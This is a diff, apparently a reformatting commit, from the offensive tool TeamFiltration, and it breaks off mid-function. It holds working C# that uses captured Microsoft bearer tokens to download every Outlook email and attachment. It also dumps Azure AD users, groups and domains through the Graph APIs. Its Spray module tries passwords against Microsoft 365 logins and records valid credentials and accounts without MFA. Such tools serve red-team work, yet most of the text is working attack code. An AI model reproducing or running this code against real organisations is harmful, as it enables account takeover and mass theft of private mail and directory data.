+							string filename = !string.IsNullOrEmpty(conversationObject.Title) ? Helpers.Generic.MakeValidFileName(conversationObject.Title).Replace(" ", "_").Replace("@", "_") : Helpers.Generic.StringToGUID(conversationObject.Id).ToString();
+							File.WriteAllText(Path.Combine(conversationLogsOutPath, filename + ".html"), chatMessage.GenerateChat(convSimple));
+						}
+						praseconversationCount++;
+						parseProgress.Report((double)praseconversationCount / parseTotalConversationCount);
+					}
+				}
 
-            }
+			}
 
-        }
-        private static async Task OWAExfilAsync(BearerTokenResp outlookToken, string outpath)
-        {
+		}
+		private static async Task OWAExfilAsync(BearerTokenResp outlookToken, string outpath)
+		{
 
-            outpath = Path.Combine(outpath, "Outlook");
+			outpath = Path.Combine(outpath, "Outlook");
 
-            _databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating emails from Outlook!", "") { }, true);
-            var username = Helpers.Generic.GetUsername(outlookToken.access_token);
+			_databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating emails from Outlook!", "") { }, true);
+			var username = Helpers.Generic.GetUsername(outlookToken.access_token);
 
-            var tokenExpires = DateTime.Now.AddSeconds(Convert.ToInt32(outlookToken.expires_in));
+			var tokenExpires = DateTime.Now.AddSeconds(Convert.ToInt32(outlookToken.expires_in));
 
-            OWAHandler oWAHandler = new OWAHandler(outlookToken, _globalProperties, _databaseHandler);
-            var outlookOutPath = Path.Combine(outpath, "Emails");
-            Directory.CreateDirectory(outlookOutPath);
-            var allEmailsJsonPath = Path.Combine(outlookOutPath, "AllEmails.json");
-            var allEmailsParsedJsonPath = Path.Combine(outlookOutPath, "AllEmails_Parsed.json");
+			OWAHandler oWAHandler = new OWAHandler(outlookToken, _globalProperties, _databaseHandler);
+			var outlookOutPath = Path.Combine(outpath, "Emails");
+			Directory.CreateDirectory(outlookOutPath);
+			var allEmailsJsonPath = Path.Combine(outlookOutPath, "AllEmails.json");
+			var allEmailsParsedJsonPath = Path.Combine(outlookOutPath, "AllEmails_Parsed.json");
 
 
-            var test = await oWAHandler.GetCalendarEvents();
+			var test = await oWAHandler.GetCalendarEvents();
 
 
-            Models.OWA.AllEmailsResp allEmailObjects = null;
-            if (File.Exists(allEmailsJsonPath))
-                allEmailObjects = JsonConvert.DeserializeObject<Models.OWA.AllEmailsResp>(File.ReadAllText(allEmailsJsonPath));
-            else
-            {
-                allEmailObjects = await oWAHandler.GetAllEmails(_globalProperties.OwaLimit);
-                File.WriteAllText(allEmailsJsonPath, JsonConvert.SerializeObject(allEmailObjects, Formatting.Indented));
-            }
-            var skipList = Directory.GetFiles(outlookOutPath, "*.html").Select(x => x.Split("_")[0].Substring(x.Split("_")[0].Length - 5)).ToArray().ToList();
+			Models.OWA.AllEmailsResp allEmailObjects = null;
+			if (File.Exists(allEmailsJsonPath))
+				allEmailObjects = JsonConvert.DeserializeObject<Models.OWA.AllEmailsResp>(File.ReadAllText(allEmailsJsonPath));
+			else
+			{
+				allEmailObjects = await oWAHandler.GetAllEmails(_globalProperties.OwaLimit);
+				File.WriteAllText(allEmailsJsonPath, JsonConvert.SerializeObject(allEmailObjects, Formatting.Indented));
+			}
+			var skipList = Directory.GetFiles(outlookOutPath, "*.html").Select(x => x.Split("_")[0].Substring(x.Split("_")[0].Length - 5)).ToArray().ToList();
 
-            allEmailObjects.value = allEmailObjects.value.Where(x => !skipList.Contains(Helpers.Generic.StringToGUID(x.Id).ToString().Split("-")[0].Substring(0, 5))).ToList();
+			allEmailObjects.value = allEmailObjects.value.Where(x => !skipList.Contains(Helpers.Generic.StringToGUID(x.Id).ToString().Split("-")[0].Substring(0, 5))).ToList();
 
-            if (allEmailObjects.value != null)
-            {
+			if (allEmailObjects.value != null)
+			{
 
-                allEmailObjects.value = allEmailObjects.value.DistinctBy(x => x.Id).ToList();
+				allEmailObjects.value = allEmailObjects.value.DistinctBy(x => x.Id).ToList();
 
-                _databaseHandler.WriteLog(new Log("EXFIL", $"Fetched {allEmailObjects.value.Count()} email ID's , exfiltrating content!", "") { }, true);
+				_databaseHandler.WriteLog(new Log("EXFIL", $"Fetched {allEmailObjects.value.Count()} email ID's , exfiltrating content!", "") { }, true);
 
-                var outlookAttachmentOutPath = Path.Combine(outpath, "EmailAttachments");
-                Directory.CreateDirectory(outlookAttachmentOutPath);
+				var outlookAttachmentOutPath = Path.Combine(outpath, "EmailAttachments");
+				Directory.CreateDirectory(outlookAttachmentOutPath);
 
-                int emailCount = 0;
-                int TotalemailCount = allEmailObjects.value.Count();
-                var allEmailsParsed = new List<Models.OWA.EmailResp>() { };
+				int emailCount = 0;
+				int TotalemailCount = allEmailObjects.value.Count();
+				var allEmailsParsed = new List<Models.OWA.EmailResp>() { };
 
-                using (var progress = new ProgressBar())
-                {
+				using (var progress = new ProgressBar())
+				{
 
 
-                    await allEmailObjects.value.ToArray().ParallelForEachAsync(
-                      async emailObject =>
-                      {
-                          try
-                          {
-                              //This is probably gonna take awhile, make sure the token dosent expire
-                              if (tokenExpires >= DateTime.Now.AddMinutes(1))
-                              {
+					await allEmailObjects.value.ToArray().ParallelForEachAsync(
+					  async emailObject =>
+					  {
+						  try
+						  {
+							  //This is probably gonna take awhile, make sure the token dosent expire
+							  if (tokenExpires >= DateTime.Now.AddMinutes(1))
+							  {
 
-                                  (Models.OWA.EmailResp emailResp, RateLimitData rateLimitData) oneEmail = await oWAHandler.GetEmailBody(emailObject.Id);
+								  (Models.OWA.EmailResp emailResp, RateLimitData rateLimitData) oneEmail = await oWAHandler.GetEmailBody(emailObject.Id);
 
 
-                                  if (oneEmail.rateLimitData.RateLimitRemaining < 10 && !string.IsNullOrEmpty(oneEmail.emailResp.Id))
-                                  {
-                                      Thread.Sleep((int)(oneEmail.rateLimitData.RateLimitReset - DateTime.Now).TotalMilliseconds);
-                                  }
+								  if (oneEmail.rateLimitData.RateLimitRemaining < 10 && !string.IsNullOrEmpty(oneEmail.emailResp.Id))
+								  {
+									  Thread.Sleep((int)(oneEmail.rateLimitData.RateLimitReset - DateTime.Now).TotalMilliseconds);
+								  }
 
-                                  if (oneEmail.emailResp.HasAttachments)
-                                  {
-                                      try
-                                      {
-                                          var attachmentObject = await oWAHandler.GetEmailAttachments(emailObject.Id);
+								  if (oneEmail.emailResp.HasAttachments)
+								  {
+									  try
+									  {
+										  var attachmentObject = await oWAHandler.GetEmailAttachments(emailObject.Id);
 
-                                          if (attachmentObject?.value != null)
-                                          {
-                                              foreach (var fileItem in attachmentObject?.value.Where(x => !string.IsNullOrEmpty(x.ContentType) && !string.IsNullOrEmpty(x.ContentBytes)).ToArray())
-                                              {
-                                                  byte[] dataContent = System.Convert.FromBase64String(fileItem.ContentBytes);
+										  if (attachmentObject?.value != null)
+										  {
+											  foreach (var fileItem in attachmentObject?.value.Where(x => !string.IsNullOrEmpty(x.ContentType) && !string.IsNullOrEmpty(x.ContentBytes)).ToArray())
+											  {
+												  byte[] dataContent = System.Convert.FromBase64String(fileItem.ContentBytes);
 
-                                                  File.WriteAllBytes(Path.Combine(outlookAttachmentOutPath, ((DateTimeOffset)fileItem.LastModifiedDateTime).ToUnixTimeSeconds().ToString() + "_" + fileItem.Name), dataContent);
-                                              }
+												  File.WriteAllBytes(Path.Combine(outlookAttachmentOutPath, ((DateTimeOffset)fileItem.LastModifiedDateTime).ToUnixTimeSeconds().ToString() + "_" + fileItem.Name), dataContent);
+											  }
 
-                                          }
+										  }
 
-                                      }
-                                      catch (Exception ex)
-                                      {
-                                          _databaseHandler.WriteLog(new Log("EXFIL", $"SOFT ERROR dumping attachments {oneEmail.emailResp.Subject}=> {ex.Message}", "") { }, true);
+									  }
+									  catch (Exception ex)
+									  {
+										  _databaseHandler.WriteLog(new Log("EXFIL", $"SOFT ERROR dumping attachments {oneEmail.emailResp.Subject}=> {ex.Message}", "") { }, true);
 
-                                      }
+									  }
 
-                                  }
+								  }
 
 
 
-                                  if (oneEmail.emailResp?.Id != null && oneEmail.emailResp?.ReceivedDateTime != null && oneEmail.emailResp.Subject != null && !string.IsNullOrEmpty(oneEmail.emailResp.Body.Content))
-                                  {
+								  if (oneEmail.emailResp?.Id != null && oneEmail.emailResp?.ReceivedDateTime != null && oneEmail.emailResp.Subject != null && !string.IsNullOrEmpty(oneEmail.emailResp.Body.Content))
+								  {
 
-                                      allEmailsParsed.Add(oneEmail.emailResp);
+									  allEmailsParsed.Add(oneEmail.emailResp);
 
-                                      var uniqID = Helpers.Generic.StringToGUID(emailObject.Id).ToString().Split("-")[0];
+									  var uniqID = Helpers.Generic.StringToGUID(emailObject.Id).ToString().Split("-")[0];
 
-                                      var fileName = uniqID + "_" + Helpers.Generic.MakeValidFileName(oneEmail.emailResp.Subject).Replace(" ", "_").Replace("@", "_") + ".html";
+									  var fileName = uniqID + "_" + Helpers.Generic.MakeValidFileName(oneEmail.emailResp.Subject).Replace(" ", "_").Replace("@", "_") + ".html";
 
 
-                                      int maxFilename = 250 - outlookOutPath.Length;
+									  int maxFilename = 250 - outlookOutPath.Length;
 
-                                      if (fileName.Length >= maxFilename)
-                                          fileName = fileName.Substring(0, maxFilename);
+									  if (fileName.Length >= maxFilename)
+										  fileName = fileName.Substring(0, maxFilename);
 
-                                      var filePath = Path.Combine(outlookOutPath, fileName);
-                                      if (!File.Exists(filePath))
-                                      {
-                                          File.WriteAllText(
-                                              filePath,
-                                              oneEmail.emailResp.Body.Content
-                                            );
-                                      }
-                                      emailCount++;
-                                      progress.Report((double)emailCount / TotalemailCount);
-                                  }
+									  var filePath = Path.Combine(outlookOutPath, fileName);
+									  if (!File.Exists(filePath))
+									  {
+										  File.WriteAllText(
+											  filePath,
+											  oneEmail.emailResp.Body.Content
+											);
+									  }
+									  emailCount++;
+									  progress.Report((double)emailCount / TotalemailCount);
+								  }
 
 
-                              }
-                              else
-                              {
-                                  //One minutes before expiration, we refresh the token
-                                  await oWAHandler.RefreshAccessToken();
-                                  tokenExpires = DateTime.Now.AddSeconds(Convert.ToInt32(oWAHandler._bearerToken.expires_in));
-                              }
-                          }
-                          catch (Exception ex)
-                          {
-                              _databaseHandler.WriteLog(new Log("EXFIL", $"SOFT ERROR getting email ID {emailObject.Id}=> {ex.Message}", "") { }, true);
+							  }
+							  else
+							  {
+								  //One minutes before expiration, we refresh the token
+								  await oWAHandler.RefreshAccessToken();
+								  tokenExpires = DateTime.Now.AddSeconds(Convert.ToInt32(oWAHandler._bearerToken.expires_in));
+							  }
+						  }
+						  catch (Exception ex)
+						  {
+							  _databaseHandler.WriteLog(new Log("EXFIL", $"SOFT ERROR getting email ID {emailObject.Id}=> {ex.Message}", "") { }, true);
 
 
-                          }
-                      },
-                      maxDegreeOfParallelism: 7
-                      );
+						  }
+					  },
+					  maxDegreeOfParallelism: 7
+					  );
 
-                    File.WriteAllText(allEmailsParsedJsonPath, JsonConvert.SerializeObject(allEmailsParsed, Formatting.Indented));
+					File.WriteAllText(allEmailsParsedJsonPath, JsonConvert.SerializeObject(allEmailsParsed, Formatting.Indented));
 
-                }
+				}
 
-            }
+			}
 
-        }
-        public static async Task MsGraphExfilAsync(BearerTokenResp msGraphToken, string baseUserOutPath, bool logDb = true)
-        {
-            if (logDb)
-                _databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating AAD users and groups via MS graph API", "") { }, true);
+		}
+		public static async Task MsGraphExfilAsync(BearerTokenResp msGraphToken, string baseUserOutPath, bool logDb = true)
+		{
+			if (logDb)
+				_databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating AAD users and groups via MS graph API", "") { }, true);
 
 
-            GraphHandler graphHandler = new GraphHandler(msGraphToken, Helpers.Generic.GetUsername(msGraphToken.access_token));
-            var username = Helpers.Generic.GetUsername(msGraphToken.access_token);
-            UsersResp graphUsers = await graphHandler.GetUsersMsGraph();
+			GraphHandler graphHandler = new GraphHandler(msGraphToken, Helpers.Generic.GetUsername(msGraphToken.access_token), _globalProperties);
+			var username = Helpers.Generic.GetUsername(msGraphToken.access_token);
+			UsersResp graphUsers = await graphHandler.GetUsersMsGraph();
 
-            if (!username.StartsWith("MissingUsername_"))
-            {
-                //Let's attempt to avoid adding service accounts
-                var filteredUserPrincipalNames = graphUsers.value.Where(x =>
-                //Check that it ends with the correct domain
-                    x.userPrincipalName.EndsWith("@" + username.Split("@")[1]) &&
-                    //Ignore all healthmailbox
-                    !x.userPrincipalName.ToLower().Contains("healthmailbox") &&
+			if (!username.StartsWith("MissingUsername_"))
+			{
+				//Let's attempt to avoid adding service accounts
+				var filteredUserPrincipalNames = graphUsers.value.Where(x =>
+					//Check that it ends with the correct domain
+					x.userPrincipalName.EndsWith("@" + username.Split("@")[1]) &&
+					//Ignore all healthmailbox
+					!x.userPrincipalName.ToLower().Contains("healthmailbox") &&
 
-                    //Ignore usernames with $
-                    !x.userPrincipalName.ToLower().Contains("$") &&
-                    x.jobTitle != null
-                ).ToList();
+					//Ignore usernames with $
+					!x.userPrincipalName.ToLower().Contains("$") &&
+					x.jobTitle != null
+				).ToList();
 
-                //remove accounts without a jobtitle?
-                filteredUserPrincipalNames = filteredUserPrincipalNames.Where(x => !string.IsNullOrEmpty((string)x.jobTitle)).ToList();
+				//remove accounts without a jobtitle?
+				filteredUserPrincipalNames = filteredUserPrincipalNames.Where(x => !string.IsNullOrEmpty((string)x.jobTitle)).ToList();
 
-                if (logDb)
-                    _databaseHandler.WriteLog(new Log("EXFIL", $"Got {filteredUserPrincipalNames.Count} AAD users, appending to database as valid users!", "") { }, true);
-                await filteredUserPrincipalNames.ParallelForEachAsync(
-                     async upn =>
-                     {
-                         if (logDb)
-                             try
-                             {
-                                 _databaseHandler.WriteValidAcc(new ValidAccount()
-                                 {
-                                     Username = upn.userPrincipalName.Trim().ToLower(),
-                                     Id = Helpers.Generic.StringToGUID(upn.userPrincipalName.Trim().ToLower()).ToString()
-                                 });
-                             }
-                             catch (Exception ex)
-                             {
+				if (logDb)
+					_databaseHandler.WriteLog(new Log("EXFIL", $"Got {filteredUserPrincipalNames.Count} AAD users, appending to database as valid users!", "") { }, true);
+				await filteredUserPrincipalNames.ParallelForEachAsync(
+					 async upn =>
+					 {
+						 if (logDb)
+							 try
+							 {
+								 _databaseHandler.WriteValidAcc(new ValidAccount()
+								 {
+									 Username = upn.userPrincipalName.Trim().ToLower(),
+									 Id = Helpers.Generic.StringToGUID(upn.userPrincipalName.Trim().ToLower()).ToString()
+								 });
+							 }
+							 catch (Exception ex)
+							 {
 
-                                 
-                             }
-                           
-                     },
-                       maxDegreeOfParallelism: 700);
-            }
 
+							 }
 
+					 },
+					   maxDegreeOfParallelism: 700);
+			}
 
-            File.WriteAllText(Path.Combine(baseUserOutPath, "MsGraph_Users.txt"), string.Join('\n', graphUsers.value.Select(x => x.userPrincipalName).ToList()));
-            File.WriteAllText(Path.Combine(baseUserOutPath, "MsGraph_Users.json"), JsonConvert.SerializeObject(graphUsers, Formatting.Indented));
 
 
-            var graphDomains = await graphHandler.GetDomainsMsGraph();
-            File.WriteAllText(Path.Combine(baseUserOutPath, "MsGraph_Domains.json"), JsonConvert.SerializeObject(graphDomains, Formatting.Indented));
+			File.WriteAllText(Path.Combine(baseUserOutPath, "MsGraph_Users.txt"), string.Join('\n', graphUsers.value.Select(x => x.userPrincipalName).ToList()));
+			File.WriteAllText(Path.Combine(baseUserOutPath, "MsGraph_Users.json"), JsonConvert.SerializeObject(graphUsers, Formatting.Indented));
 
 
+			var graphDomains = await graphHandler.GetDomainsMsGraph();
+			File.WriteAllText(Path.Combine(baseUserOutPath, "MsGraph_Domains.json"), JsonConvert.SerializeObject(graphDomains, Formatting.Indented));
 
-            Models.Graph.GroupsResp adGroups = await graphHandler.GetGroupsMsGraph();
-            File.WriteAllText(Path.Combine(baseUserOutPath, "MsGraph_Groups.json"), JsonConvert.SerializeObject(adGroups, Formatting.Indented));
 
-            var userGroupRelations = new StringBuilder();
-            try
-            {
 
+			Models.Graph.GroupsResp adGroups = await graphHandler.GetGroupsMsGraph();
+			File.WriteAllText(Path.Combine(baseUserOutPath, "MsGraph_Groups.json"), JsonConvert.SerializeObject(adGroups, Formatting.Indented));
 
-                await adGroups?.Value.ParallelForEachAsync(
-                async groupObject =>
-                {
-                    try
-                    {
+			var userGroupRelations = new StringBuilder();
+			try
+			{
 
-                        var domainGroups = await graphHandler.GetGroupMembersMsGraph(groupObject?.id);
 
-                        foreach (var user in domainGroups?.value)
-                        {
-                            var userName = (string.IsNullOrEmpty(user.userPrincipalName)) ? user.mail : user.userPrincipalName;
+				await adGroups?.Value.ParallelForEachAsync(
+				async groupObject =>
+				{
+					try
+					{
 
-                            if (!string.IsNullOrEmpty(userName))
-                                userGroupRelations.AppendLine($"{user.userPrincipalName}:{groupObject.displayName}");
-                        }
-                    }
-                    catch (Exception ex)
-                    {
+						var domainGroups = await graphHandler.GetGroupMembersMsGraph(groupObject?.id);
 
+						foreach (var user in domainGroups?.value)
+						{
+							var userName = (string.IsNullOrEmpty(user.userPrincipalName)) ? user.mail : user.userPrincipalName;
 
-                    }
+							if (!string.IsNullOrEmpty(userName))
+								userGroupRelations.AppendLine($"{user.userPrincipalName}:{groupObject.displayName}");
+						}
+					}
+					catch (Exception ex)
+					{
 
-                },
-                maxDegreeOfParallelism: 70);
-            }
-            catch (Exception ex)
-            {
 
+					}
 
-            }
+				},
+				maxDegreeOfParallelism: 70);
+			}
+			catch (Exception ex)
+			{
 
-            var filePath = Path.Combine(baseUserOutPath, "MsGraph_Groups.txt");
-            File.WriteAllText(filePath, userGroupRelations.ToString());
 
-        }
-        private static async Task AdGraphExfilAsync(BearerTokenResp adGraphToken, string baseUserOutPath)
-        {
+			}
 
-            _databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating AAD users and groups via MS AD Graph API", "") { }, true);
+			var filePath = Path.Combine(baseUserOutPath, "MsGraph_Groups.txt");
+			File.WriteAllText(filePath, userGroupRelations.ToString());
 
-            var tenantId = Helpers.Generic.GetTenantId(adGraphToken.access_token);
+		}
+		private static async Task AdGraphExfilAsync(BearerTokenResp adGraphToken, string baseUserOutPath)
+		{
 
-            GraphHandler graphHandler = new GraphHandler(adGraphToken, Helpers.Generic.GetUsername(adGraphToken.access_token));
+			_databaseHandler.WriteLog(new Log("EXFIL", $"Exfiltrating AAD users and groups via MS AD Graph API", "") { }, true);
 
-            var adUsers = await graphHandler.GetUsersAdGraph(tenantId);
+			var tenantId = Helpers.Generic.GetTenantId(adGraphToken.access_token);
 
-            if (adUsers?.value != null)
-            {
-                File.WriteAllText(Path.Combine(baseUserOutPath, "AdGraph_Users.txt"), string.Join('\n', adUsers.value?.Select(x => x?.userPrincipalName).ToList()));
-                File.WriteAllText(Path.Combine(baseUserOutPath, "AdGraph_Users.json"), JsonConvert.SerializeObject(adUsers, Formatting.Indented));
-            }
-            var aadDomains = await graphHandler.GetDomainsAdGraph(tenantId);
+			GraphHandler graphHandler = new GraphHandler(adGraphToken, Helpers.Generic.GetUsername(adGraphToken.access_token), _globalProperties);
 
-            if (aadDomains?.value != null)
-                File.WriteAllText(Path.Combine(baseUserOutPath, "AdGraph_Domains.json"), JsonConvert.SerializeObject(aadDomains, Formatting.Indented));
+			var adUsers = await graphHandler.GetUsersAdGraph(tenantId);
 
-            var aadGroups = await graphHandler.GetGroupsAdGraph(tenantId);
-            if (aadGroups?.value != null)
-                File.WriteAllText(Path.Combine(baseUserOutPath, "AdGraph_Groups.json"), JsonConvert.SerializeObject(aadGroups, Formatting.Indented));
+			if (adUsers?.value != null)
+			{
+				File.WriteAllText(Path.Combine(baseUserOutPath, "AdGraph_Users.txt"), string.Join('\n', adUsers.value?.Select(x => x?.userPrincipalName).ToList()));
+				File.WriteAllText(Path.Combine(baseUserOutPath, "AdGraph_Users.json"), JsonConvert.SerializeObject(adUsers, Formatting.Indented));
+			}
+			var aadDomains = await graphHandler.GetDomainsAdGraph(tenantId);
 
+			if (aadDomains?.value != null)
+				File.WriteAllText(Path.Combine(baseUserOutPath, "AdGraph_Domains.json"), JsonConvert.SerializeObject(aadDomains, Formatting.Indented));
 
-            var userGroupRelations = new StringBuilder();
+			var aadGroups = await graphHandler.GetGroupsAdGraph(tenantId);
+			if (aadGroups?.value != null)
+				File.WriteAllText(Path.Combine(baseUserOutPath, "AdGraph_Groups.json"), JsonConvert.SerializeObject(aadGroups, Formatting.Indented));
 
-            if (aadGroups?.value != null)
-            {
-                await aadGroups?.value?.ParallelForEachAsync(
-                    async groupObject =>
-                    {
-                        var domainGroups = await graphHandler.GetGroupMembersAdGraph(groupObject.objectId, tenantId);
 
-                        foreach (var user in domainGroups.value)
-                        {
-                            try
-                            {
-                                var userName = (string.IsNullOrEmpty(user.userPrincipalName)) ? user.mail : user.userPrincipalName;
+			var userGroupRelations = new StringBuilder();
 
-                                if (!string.IsNullOrEmpty(userName))
-                                    userGroupRelations.AppendLine($"{user.userPrincipalName}:{groupObject.onPremisesSamAccountName}");
-                            }
-                            catch (Exception)
-                            {
+			if (aadGroups?.value != null)
+			{
+				await aadGroups?.value?.ParallelForEachAsync(
+					async groupObject =>
+					{
+						var domainGroups = await graphHandler.GetGroupMembersAdGraph(groupObject.objectId, tenantId);
 
+						foreach (var user in domainGroups.value)
+						{
+							try
+							{
+								var userName = (string.IsNullOrEmpty(user.userPrincipalName)) ? user.mail : user.userPrincipalName;
 
-                            }
-                        }
+								if (!string.IsNullOrEmpty(userName))
+									userGroupRelations.AppendLine($"{user.userPrincipalName}:{groupObject.onPremisesSamAccountName}");
+							}
+							catch (Exception)
+							{
 
-                    },
-                    maxDegreeOfParallelism: 70);
 
-                var filePath = Path.Combine(baseUserOutPath, "AdGraph_Groups.txt");
-                File.WriteAllText(filePath, userGroupRelations.ToString());
-            }
-        }
+							}
+						}
 
-        #endregion
+					},
+					maxDegreeOfParallelism: 70);
 
-    }
+				var filePath = Path.Combine(baseUserOutPath, "AdGraph_Groups.txt");
+				File.WriteAllText(filePath, userGroupRelations.ToString());
+			}
+		}
+
+		#endregion
+
+	}
 
 }

--- a/TeamFiltration/TeamFiltration/Modules/Spray.cs
+++ b/TeamFiltration/TeamFiltration/Modules/Spray.cs
@@ -20,511 +20,510 @@ using TimeZoneConverter;
 
 namespace TeamFiltration.Modules
 {
-    class Spray
-    {
+	class Spray
+	{
 
 
 
-        public static async Task<SprayAttempt> SprayAttemptWrap(SprayAttempt sprayAttempt, GlobalArgumentsHandler teamFiltrationConfig, DatabaseHandler _databaseHandler, UserRealmResp userRealmResp)
-        {
+		public static async Task<SprayAttempt> SprayAttemptWrap(SprayAttempt sprayAttempt, GlobalArgumentsHandler teamFiltrationConfig, DatabaseHandler _databaseHandler, UserRealmResp userRealmResp)
+		{
 
-            var _mainMSOLHandler = new MSOLHandler(teamFiltrationConfig, "SPRAY", _databaseHandler);
+			var _mainMSOLHandler = new MSOLHandler(teamFiltrationConfig, "SPRAY", _databaseHandler);
 
 
-            try
-            {
-                var loginResp = await _mainMSOLHandler.LoginSprayAttempt(sprayAttempt, userRealmResp);
+			try
+			{
+				var loginResp = await _mainMSOLHandler.LoginSprayAttempt(sprayAttempt, userRealmResp);
 
-                //Check if we got an access token in response
-                if (!string.IsNullOrWhiteSpace(loginResp.bearerToken?.access_token))
-                {
-                    if (userRealmResp.Adfs)
-                        _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => VALID!", sprayAttempt.FireProxRegion));
-                    else
-                        _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => VALID NO MFA!", sprayAttempt.FireProxRegion));
-                    sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
-                    sprayAttempt.Valid = true;
+				//Check if we got an access token in response
+				if (!string.IsNullOrWhiteSpace(loginResp.bearerToken?.access_token))
+				{
+					if (userRealmResp.Adfs)
+						_databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => VALID!", sprayAttempt.FireProxRegion));
+					else
+						_databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => VALID NO MFA!", sprayAttempt.FireProxRegion));
+					sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
+					sprayAttempt.Valid = true;
 
-                }
+				}
 
-                else if (!string.IsNullOrWhiteSpace(loginResp.bearerTokenError?.error_description))
-                {
-                    var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
-                    var message = loginResp.bearerTokenError.error_description.Split(":")[1].Trim();
+				else if (!string.IsNullOrWhiteSpace(loginResp.bearerTokenError?.error_description))
+				{
+					var respCode = loginResp.bearerTokenError.error_description.Split(":")[0].Trim();
+					var message = loginResp.bearerTokenError.error_description.Split(":")[1].Trim();
 
-                    //Set a default response
-                    var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
+					//Set a default response
+					var errorCodeOut = (msg: $"UNKNOWN {respCode}", valid: false, disqualified: false, accessPolicy: false);
 
-                    //Try to parse
-                    Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
+					//Try to parse
+					Helpers.Generic.GetErrorCodes().TryGetValue(respCode, out errorCodeOut);
 
-                    //Write result
-                    var printLogBool = (errorCodeOut.accessPolicy || errorCodeOut.valid || errorCodeOut.disqualified);
+					//Write result
+					var printLogBool = (errorCodeOut.accessPolicy || errorCodeOut.valid || errorCodeOut.disqualified);
 
-                    if (!string.IsNullOrEmpty(errorCodeOut.msg))
-                        _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {errorCodeOut.msg}", sprayAttempt.FireProxRegion), true, true);
-                    else
-                        _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {respCode.Trim()}", sprayAttempt.FireProxRegion), true, true);
+					if (!string.IsNullOrEmpty(errorCodeOut.msg))
+						_databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {errorCodeOut.msg}", sprayAttempt.FireProxRegion), true, true);
+					else
+						_databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => {respCode.Trim()}", sprayAttempt.FireProxRegion), true, true);
 
-                    //If we get a valid response, parse and set the token data as json
-                    if (errorCodeOut.valid)
-                        sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
+					//If we get a valid response, parse and set the token data as json
+					if (errorCodeOut.valid)
+						sprayAttempt.ResponseData = JsonConvert.SerializeObject(loginResp.bearerToken);
 
-                    sprayAttempt.ResponseCode = respCode;
-                    sprayAttempt.Valid = errorCodeOut.valid;
-                    sprayAttempt.Disqualified = errorCodeOut.disqualified;
-                    sprayAttempt.ConditionalAccess = errorCodeOut.accessPolicy;
+					sprayAttempt.ResponseCode = respCode;
+					sprayAttempt.Valid = errorCodeOut.valid;
+					sprayAttempt.Disqualified = errorCodeOut.disqualified;
+					sprayAttempt.ConditionalAccess = errorCodeOut.accessPolicy;
 
-                }
-                else
-                {
-                    _databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => UNKNOWN or malformed response!", sprayAttempt.FireProxRegion));
+				}
+				else
+				{
+					_databaseHandler.WriteLog(new Log("SPRAY", $"Sprayed {sprayAttempt.Username}:{sprayAttempt.Password} => UNKNOWN or malformed response!", sprayAttempt.FireProxRegion));
 
-                }
+				}
 
-                _databaseHandler.WriteSprayAttempt(sprayAttempt, teamFiltrationConfig);
-            }
-            catch (Exception ex)
-            {
-                _databaseHandler.WriteLog(new Log("SPRAY", $"SOFT ERROR when spraying  {sprayAttempt.Username}:{sprayAttempt.Password} => {ex.Message}", sprayAttempt.FireProxRegion));
+				_databaseHandler.WriteSprayAttempt(sprayAttempt, teamFiltrationConfig);
+			}
+			catch (Exception ex)
+			{
+				_databaseHandler.WriteLog(new Log("SPRAY", $"SOFT ERROR when spraying  {sprayAttempt.Username}:{sprayAttempt.Password} => {ex.Message}", sprayAttempt.FireProxRegion));
 
-            }
-            _databaseHandler._globalDatabase.Checkpoint();
+			}
+			_databaseHandler._globalDatabase.Checkpoint();
 
 
 
-            return sprayAttempt;
+			return sprayAttempt;
 
-        }
-        private static async Task<List<SprayAttempt>> SprayAttemptWrap(
-            List<SprayAttempt> sprayAttempts,
-            GlobalArgumentsHandler teamFiltrationConfig,
-            DatabaseHandler _databaseHandler,
-            UserRealmResp userRealmResp,
-            int delayInSeconds = 0,
-            int regionCounter = 0)
-        {
+		}
+		private static async Task<List<SprayAttempt>> SprayAttemptWrap(
+			List<SprayAttempt> sprayAttempts,
+			GlobalArgumentsHandler teamFiltrationConfig,
+			DatabaseHandler _databaseHandler,
+			UserRealmResp userRealmResp,
+			int delayInSeconds = 0,
+			int regionCounter = 0)
+		{
 
-            var _mainMSOLHandler = new MSOLHandler(teamFiltrationConfig, "SPRAY", _databaseHandler);
+			var _mainMSOLHandler = new MSOLHandler(teamFiltrationConfig, "SPRAY", _databaseHandler);
 
-            var validSprayAttempts = new List<SprayAttempt>() { };
-            await sprayAttempts.ParallelForEachAsync(
-                  async sprayAttempt =>
-                          {
-                              try
-                              {
+			var validSprayAttempts = new List<SprayAttempt>() { };
+			await sprayAttempts.ParallelForEachAsync(
+				  async sprayAttempt =>
+				  {
+					  try
+					  {
 
 
-                                  (BearerTokenResp bearerToken, BearerTokenErrorResp bearerTokenError) loginResp = await _mainMSOLHandler.LoginSprayAttempt(sprayAttempt, userRealmResp);
